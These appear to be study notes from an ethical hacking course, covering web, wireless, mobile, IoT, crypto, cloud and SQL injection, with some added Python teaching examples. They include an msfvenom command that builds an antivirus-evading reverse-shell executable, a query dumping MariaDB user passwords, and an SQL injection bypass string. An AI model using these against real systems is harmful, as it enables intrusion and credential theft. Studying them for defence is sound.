Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.

Evasion Techniques



└─$ msfvenom --list encoders

└─$ msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe

Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed

Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.


Chapter 13:  Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore

Introduction to WEB Servers 

Return Code from web servers

  • 200 - processed OK

  • 400 - bad request

  • 403 - unauthorized

  • 404 - not found

  • 500 - internal server error 


Google QUIC

burpsuite | Kali Linux Tools

Testing vulnerable website

OWASP WebGoat - Learn the hack - Stop the attack




└─$ whatweb

[200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]


└─$ whatweb -l | more   

Web Security Dojo

A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo


Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore

Wi-Fi Networks

Speed Standards

Wireless security

  • Network key

  • Internet login

  • MAC filtering

  • Encryption- WEP, WPA, and WPA2

  • Connection -WPS

Signal aspects of wireless

  • Performance in dBi is against a benchmark 

  • Gain is expressed in units of dBi, decibels isotropic, and the higher the decibels, the more powerful the antenna, and the more reliable the communication is. Sometimes performance will be expressed as dBm, which is pure signal power. dBm are related to milliwatts through the equation dBm = 10 * log10(milliwatts).

  • When transmitting, a positive number represents better performance, or gain, from the benchmark, and a negative number means lower performance, or loss. 1,000 milliwatts, or 30 dBm, is rated to be a good transmitter.

  • For reception, the opposite is true. We want to be able to receive weaker signals, and a good antenna should be able to operate down to about minus 90 dBm.
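To make the dBm arithmetic above concrete, here is an added example (not from the course or these notes) that implements dBm = 10 * log10(mW) and its inverse, then carries the figures from the notes (a 30 dBm transmitter, antenna gain in dBi, a receive floor of about -90 dBm) through a free-space link budget to estimate the distance at which the link stops closing. The free-space path-loss formula and the sample link parameters are assumptions added here.

```python
"""Wi-Fi signal arithmetic from the notes above (added example, not course code).

Implements the milliwatt/dBm conversion and a simple link budget: transmit
power (dBm) plus both antenna gains (dBi) minus free-space path loss must stay
at or above the receiver sensitivity. The path-loss model and the sample link
are assumptions for illustration, not figures from the notes.
"""
import math


def mw_to_dbm(power_mw):
    """Power in milliwatts -> dBm. 1000 mW -> 30 dBm, 1 mW -> 0 dBm."""
    if power_mw <= 0:
        raise ValueError("power must be positive")
    return 10.0 * math.log10(power_mw)


def dbm_to_mw(power_dbm):
    """dBm -> milliwatts. -90 dBm -> 1e-9 mW, i.e. one picowatt."""
    return 10.0 ** (power_dbm / 10.0)


def free_space_path_loss_db(distance_m, freq_mhz):
    """Free-space path loss (assumed model): 20log10(d_km) + 20log10(f_MHz) + 32.44."""
    if distance_m <= 0 or freq_mhz <= 0:
        raise ValueError("distance and frequency must be positive")
    return 20.0 * math.log10(distance_m / 1000.0) + 20.0 * math.log10(freq_mhz) + 32.44


def received_power_dbm(tx_dbm, tx_gain_dbi, rx_gain_dbi, distance_m, freq_mhz):
    """Link budget: transmit power plus both antenna gains minus path loss."""
    return tx_dbm + tx_gain_dbi + rx_gain_dbi - free_space_path_loss_db(distance_m, freq_mhz)


def link_closes(tx_dbm, tx_gain_dbi, rx_gain_dbi, distance_m, freq_mhz, sensitivity_dbm=-90.0):
    """True when the received power is at or above the receiver's sensitivity."""
    return received_power_dbm(tx_dbm, tx_gain_dbi, rx_gain_dbi, distance_m, freq_mhz) >= sensitivity_dbm


def max_range_m(tx_dbm, tx_gain_dbi, rx_gain_dbi, freq_mhz, sensitivity_dbm=-90.0):
    """Solve the budget for distance: the largest free-space range that still closes."""
    allowed_loss_db = tx_dbm + tx_gain_dbi + rx_gain_dbi - sensitivity_dbm
    km = 10.0 ** ((allowed_loss_db - 20.0 * math.log10(freq_mhz) - 32.44) / 20.0)
    return km * 1000.0


if __name__ == "__main__":
    # Assumed link: 1000 mW (30 dBm) radio, 2 dBi antennas at both ends, 2437 MHz (channel 6).
    tx = mw_to_dbm(1000)
    for d in (100, 10_000, 20_000):
        rx = received_power_dbm(tx, 2, 2, d, 2437)
        print(f"{d:6} m: {rx:7.1f} dBm  closes={link_closes(tx, 2, 2, d, 2437)}")
    print(f"max free-space range ~ {max_range_m(tx, 2, 2, 2437):.0f} m")
```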

Yagi antenna or fishbone antenna

Parabolic antenna

wifite | Kali Linux Tools

reaver | Kali Linux Tools

  • Reaver 

  • Wash



Wifi Pineapple:

WiFi Pineapple - Hak5


fern-wifi-cracker | Kali Linux Tools

MetaGeek | inSSIDer - Defeat Slow Wi-Fi



Bluetooth profiles

  • Serial Port Profile SPP

  • Human interface Device Profile HID

  • Hands-Free Profile HFP

  • Advanced Audio Distribution Profile A2DP

  • Audio/Video Remote control Profile AVRCP


└─$ lsusb


└─$ sudo bluelog -l


└─$ btscanner 


└─$ fang -h


Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore

Mobile technology

  • OWASP Mobile Security methodologies 

  • Effective testing

    • Static analysis

      • App source code

      • Reverse engineering

      • Clone runtime environment

      • Identify

        • All network interfaces

        • Network protocols

        • Component interactions

        • Data access

        • App interfaces

      • Encryption

      • Pinning

        • Certificate

        • Public key

    • Dynamic analysis

      • Changes to device storage

      • Info transmitted

      • Web app testing

    • Forensic analysis

    • Virtualization

OWASP Mobile Security Testing Guide

OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.


  • Builds on the Linux security model 

  • “*.dex” extensions are Dalvik executable files.

Download Android Studio & App Tools

Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps.

Apk Files

dex2jar download |

dex2jar | Kali Linux Tools

GitHub - skylot/jadx: Dex to Java decompiler

OWASP Security Shepherd

The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.


Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari

Internet of Things 

IoT Attacks 

  • Lack of security

  • Vulnerable interfaces

  • Lack of firmware updates

OWASP Internet of Things

Type of attacks

  • DDoS

  • Rolling code attack

  • BlueBorne attack

  • Jamming attacks

  • Backdoor

  • Sybil

  • Side channel 

Hacking Methodology

  • Information gathering

  • Vulnerability scanning

  • Launch attack

  • Gain access

  • Maintain access 


Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas


  • Symmetric Cryptography 

  • Asymmetric

  • Hashing 


  • Plaintext 

  • Block

  • Stream

DES - Data Encryption standard 

  • Replaced by AES

AES - Advanced Encryption Standard 

RC - Rivest Cipher

  • Symmetric

  • Designed by Ron Rivest

  • RC4

  • RC5

  • RC6

ECC - Elliptic Curve Cryptography


Hybrid Cipher

  • Symmetric & Asymmetric combined together 


  • One way function

  • Used in passwords

MD5 - Message Digest

  • 128-bit output

SHA - Secure hashing Algorithm

  • 160-bit output
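The hashing points above (one-way function, used for passwords, 128-bit MD5 and 160-bit SHA output) as an added example, not code from the original notes. It uses only the Python standard library: digest sizes are read from hashlib, and password storage is shown with a salted, iterated derivation (PBKDF2-HMAC-SHA256) plus a constant-time comparison, since a bare fast hash such as MD5 is not enough for passwords. The iteration count and the sample password are constructed values.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

DEFAULT_ITERATIONS = 600_000  # constructed default; tune to your hardware budget


def digest_bits(algorithm: str, data: bytes) -> int:
    """Output size in bits of the named hash: md5 -> 128, sha1 -> 160, sha256 -> 256."""
    return hashlib.new(algorithm, data).digest_size * 8


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = DEFAULT_ITERATIONS) -> Tuple[bytes, bytes]:
    """Derive a salted, slow hash for storage; returns (salt, derived_key).

    The salt makes identical passwords hash differently (defeats rainbow
    tables), and the iteration count makes each guess expensive for an
    attacker who obtains the stored hashes.
    """
    if salt is None:
        salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, derived


def verify_password(password: str, salt: bytes, stored: bytes,
                    iterations: int = DEFAULT_ITERATIONS) -> bool:
    """Recompute with the stored salt and compare in constant time.

    The hash is one-way, so the server never needs (and cannot recover) the
    original password; it can only check a candidate against the stored value.
    """
    _, candidate = hash_password(password, salt, iterations)
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    print(digest_bits("md5", b"abc"), digest_bits("sha1", b"abc"))  # 128 160
    salt, stored = hash_password("correct horse")          # constructed sample
    print(verify_password("correct horse", salt, stored))  # True
    print(verify_password("wrong horse", salt, stored))    # False
```

Note that `hmac.compare_digest` is used instead of `==` so the comparison time does not leak how many leading bytes matched.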

Digital Certificates

  • Authorized Agency Verification 

  • CA - Certificate authority verification

  • Digital Certificate X.509

    • Version

    • Serial no

    • Algorithm ID

    • Issuer

    • Validity

DSA - Digital Signature Algorithm 

PKI - Public Key Infrastructure

  • Certificate management system

  • Digital certificate 

  • CRL - certificate revocation list

  • CA - certificate authority  

  • RA registration authority 

  • Enduser 

New Secure Protocols

  • S/MIME - Secure MIME - added digital signature, public key encryption to emails

  • PGP - Pretty good privacy - similar to PKI

  • SSH - Secure Shell - encrypted channel for remote command execution on a system.

Real world exploits


  • Electronic Frontier Foundation EFF

    • Electronic Frontier Foundation


  • Heartbleed 


  • Poodlebleed "Padding Oracle On Downgraded Legacy Encryption"

  • DROWN - Decrypting RSA with Obsolete and Weakened eNcryption


  • FREAK ("Factoring RSA Export Keys")


Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance

Cloud Overview

  • XaaS

  • SaaS

  • PaaS

  • IaaS

Cloud identity Management 

  • MFA Multi Factor Authentication 

  • RBAC Role-Based Access Control

Cloud High Availability

  • Business Continuity and Risk Management

    • Identify assets

    • Identify assets threats

    • Identify threat likelihood

  • Data Replication 

  • Application Resiliency 

GDPR General Data Protection Regulation 

PCI DSS - Payment Card Industry Data Security Standard 


Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore

Testing SQL Injection

OWASP Security Shepherd



└─$ service mysql start  


└─$ sudo mysql -u root -p 

MariaDB [(none)]> show databases;

MariaDB [(none)]> use information_schema;

MariaDB [information_schema]> show tables;

MariaDB [information_schema]> use mysql

MariaDB [mysql]> show databases; 

MariaDB [mysql]> show tables;

MariaDB [mysql]> show columns from user;

MariaDB [mysql]> select user,password from user;
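The MariaDB session above enumerates what a database exposes; the example below, added here and not part of the original notes, shows the defect that testing SQL injection looks for and its fix, side by side. It runs offline against a constructed in-memory SQLite table (the users and passwords are made up), so no MariaDB instance is needed: the vulnerable login concatenates user input into the query, the safe login binds it as a parameter, and a probe function shows the usual first test, a stray single quote that breaks the query only in the vulnerable form.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two fake accounts, plaintext for brevity only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Builds the query by string concatenation: input can change the SQL itself."""
    query = ("SELECT COUNT(*) FROM users WHERE user = '" + user +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Parameterised query: input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE user = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row[0] > 0


def quote_probe_triggers_error(login_fn, conn: sqlite3.Connection) -> bool:
    """Testing step: a lone single quote that raises a database error is the
    classic sign that input reaches the query as SQL syntax."""
    try:
        login_fn(conn, "alice'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    bypass = "x' OR '1'='1"          # tautology that makes the WHERE clause always true
    print(login_vulnerable(db, "alice", bypass))   # True  (authentication bypassed)
    print(login_safe(db, "alice", bypass))         # False (treated as a literal password)
    print(quote_probe_triggers_error(login_vulnerable, db))  # True
    print(quote_probe_triggers_error(login_safe, db))        # False
```

The fix is not escaping quotes by hand but keeping data and code separate with bound parameters; the same pattern applies to the MariaDB client libraries used against the database shown above.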


